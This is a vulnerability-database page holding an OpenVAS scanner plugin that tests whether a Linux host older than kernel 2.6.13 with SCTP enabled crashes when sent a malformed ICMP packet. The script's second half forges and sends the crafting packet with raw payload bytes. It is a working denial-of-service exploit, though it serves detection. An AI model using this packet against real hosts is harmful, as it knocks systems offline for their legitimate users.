Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
openvasCopyright (C) 2005 Michel ArboiOPENVAS:136141256231019777
HistoryMar 26, 2006 - 12:00 a.m.

Malformed ICMP Packets May Cause a Denial of Service (SCTP)

2006-03-2600:00:00
Copyright (C) 2005 Michel Arboi
plugins.openvas.org
118

7.4 High

AI Score

Confidence

Low

JSON

It is possible to crash the remote host by sending it malformed ICMP packets.

# SPDX-FileCopyrightText: 2005 Michel Arboi
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.19777");
  script_version("2024-06-26T05:05:39+0000");
  script_tag(name:"last_modification", value:"2024-06-26 05:05:39 +0000 (Wed, 26 Jun 2024)");
  script_tag(name:"creation_date", value:"2006-03-26 17:55:15 +0200 (Sun, 26 Mar 2006)");
  script_tag(name:"cvss_base", value:"7.8");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:C/A:N");
  script_name("Malformed ICMP Packets May Cause a Denial of Service (SCTP)");
  script_category(ACT_KILL_HOST);
  script_copyright("Copyright (C) 2005 Michel Arboi");
  script_family("Denial of Service");
  script_dependencies("global_settings.nasl", "os_detection.nasl");
  script_exclude_keys("keys/TARGET_IS_IPV6");
  script_mandatory_keys("Host/runs_unixoide");

  script_xref(name:"URL", value:"https://web.archive.org/web/20060718224254/http://oss.sgi.com/projects/netdev/archive/2005-07/msg00142.html");

  script_tag(name:"solution", value:"Update to Linux 2.6.13 or newer, or disable SCTP support.");

  script_tag(name:"summary", value:"It is possible to crash the remote host by sending it malformed ICMP packets.");

  script_tag(name:"insight", value:"Linux Kernels older than version 2.6.13 contains a bug which may allow an
  attacker to cause a NULL pointer dereference by sending malformed ICMP packets, thus resulting in a kernel panic.

  This flaw is present only if SCTP support is enabled on the remote host.");

  script_tag(name:"impact", value:"An attacker to make this host crash continuously, thus preventing legitimate
  users from using it.");

  script_tag(name:"qod_type", value:"remote_probe");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

if(TARGET_IS_IPV6())
  exit(0);

# Ensure that the host is still up
start_denial();
sleep( 2 );
up = end_denial();
if( ! up )
  exit( 0 );

start_denial();

src = this_host();
dst = get_host_ip();
id = rand();

ip = forge_ip_packet(ip_v:4, ip_hl:5, ip_tos:0xC0, ip_off: 0,
                     ip_p:IPPROTO_ICMP, ip_id: id, ip_ttl:0x40,
                     ip_src:this_host());
ip2 = forge_ip_packet(ip_v:4, ip_hl:5, ip_tos:0, ip_off: 0,
                      ip_p: 132, ip_id: id+1, ip_ttl:0x40,
                      ip_src:this_host(),
                      data: '\x28\x00\x00\x50\x00\x00\x00\x00\xf9\x57\x1F\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00');
icmp = forge_icmp_packet(ip:ip, icmp_type: 3, icmp_code:2,
                         icmp_seq: 0, icmp_id: 0, data: ip2);
send_packet(icmp, pcap_active: FALSE);

alive = end_denial();
if(!alive) {
  security_message(port:0, proto:"icmp");
  set_kb_item( name:"Host/dead", value:TRUE );
}

7.4 High

AI Score

Confidence

Low

JSON